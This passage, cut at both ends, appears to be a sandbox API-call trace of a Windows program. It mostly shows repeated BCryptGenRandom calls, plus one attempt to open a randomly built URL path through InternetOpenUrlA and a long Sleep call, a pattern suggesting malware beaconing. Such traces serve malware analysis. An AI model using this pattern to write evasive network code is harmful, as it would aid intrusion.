lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0259.986] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16801, cbBuffer=0x21, dwFlags=0x2 | out: pbBuffer=0x3a16801) returned 0x0 [0259.987] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.987] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.987] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.987] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.988] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.988] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.988] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.988] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.988] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.988] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.988] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.988] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.989] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.989] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.989] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.989] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.989] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.989] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.989] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.989] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.989] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.990] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.990] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.990] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.990] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.990] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.990] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.990] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.991] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.991] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.991] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.991] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.991] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.991] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.991] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.991] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.992] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.992] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.992] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.992] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.992] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.992] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0259.992] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.992] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16822, cbBuffer=0x16, dwFlags=0x2 | out: pbBuffer=0x3a16822) returned 0x0 [0259.992] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.993] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.993] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.993] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0259.993] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.993] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.993] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.993] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.993] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.993] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.994] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.994] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.994] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.994] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.994] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.994] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.995] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.995] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.995] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.995] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.995] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.995] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.995] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.995] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.996] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.996] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.996] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.996] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0259.996] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.996] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16838, cbBuffer=0x21, dwFlags=0x2 | out: pbBuffer=0x3a16838) returned 0x0 [0259.996] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.996] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.997] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.997] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.997] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.997] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.997] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.997] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.997] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.997] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.998] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.998] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.998] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.998] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.998] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.998] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.998] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.998] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.999] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.999] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.999] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.999] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.999] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.999] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.999] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.999] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.999] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.999] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.000] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.000] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.000] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.000] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.001] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.001] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.001] GetProcessHeap () returned 0x440000 [0260.001] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473350 [0260.001] lstrcpyA (in: lpString1=0x473350, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0260.001] lstrcatA (in: lpString1="\x04", lpString2="/5u0lIqwcqwpw2aq1mKXwkYabfxfoqic5/0lImuaUm61dXZvv1Bk9Yr/5cbmhWHmJab1r36csaMxM0kxlnich4p6/" | out: lpString1="\x04/5u0lIqwcqwpw2aq1mKXwkYabfxfoqic5/0lImuaUm61dXZvv1Bk9Yr/5cbmhWHmJab1r36csaMxM0kxlnich4p6/") returned="\x04/5u0lIqwcqwpw2aq1mKXwkYabfxfoqic5/0lImuaUm61dXZvv1Bk9Yr/5cbmhWHmJab1r36csaMxM0kxlnich4p6/" [0260.001] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0260.001] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/5u0lIqwcqwpw2aq1mKXwkYabfxfoqic5/0lImuaUm61dXZvv1Bk9Yr/5cbmhWHmJab1r36csaMxM0kxlnich4p6/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0260.001] GetProcessHeap () returned 0x440000 [0260.001] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473350 | out: hHeap=0x440000) returned 1 [0260.001] GetProcessHeap () returned 0x440000 [0260.001] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a16800 | out: hHeap=0x440000) returned 1 [0260.002] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0260.002] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0260.002] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.002] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0260.002] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0260.002] Sleep (dwMilliseconds=0x1cb7a) [0260.169] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.169] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0260.169] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.170] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0260.170] GetProcessHeap () returned 0x440000 [0260.170] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a01a50 [0260.170] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.170] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0260.170] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.170] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01a51, cbBuffer=0x2b, dwFlags=0x2 | out: pbBuffer=0x3a01a51) returned 0x0 [0260.170] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.170] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.171] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.171] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.171] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.171] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.171] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.171] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.171] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.171] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.172] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.172] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.172] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.172] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.172] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.172] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.172] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.172] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.173] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.173] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.173] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.323] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.323] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.323] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.324] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.324] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.324] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.324] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.324] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.324] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.324] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.324] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.325] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.325] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.325] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.325] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.325] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.325] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.325] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.325] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.326] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.326] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.326] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.326] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0260.326] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.326] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0260.326] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0260.327] BCryptGenRandom (in: hAlgorithm=0x0, 